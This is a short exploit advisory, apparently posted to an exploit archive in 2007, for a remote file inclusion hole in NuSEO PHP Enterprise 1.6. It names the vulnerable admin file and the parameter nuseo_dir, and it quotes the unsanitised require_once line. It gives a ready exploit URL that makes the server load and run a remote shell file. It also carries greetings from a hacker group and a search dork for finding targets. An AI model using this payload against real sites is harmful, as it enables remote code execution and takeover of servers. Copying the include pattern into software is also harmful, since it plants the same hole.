Home / os / solaris

nuseo-rfi.txt

Posted on 11 October 2007

Vulnerability Type: Remote File Inclusion Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt? Method: get Register_globals: On Vulnerable variable: nuseo_dir Line number: 268 Lines: ---------------------------------------------- require_once( $nuseo_dir . '/nuseo' . '_d.php' ); //nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' ); ---------------------------------------------- GrEeTs To sHaDoW sEcUrItY TeAm & str0ke FoUnD By BiNgZa DoRk'SEO by NuSEO.PHP' shadowcrew@hotmail.co.uk shadow.php0h.com

 

TOP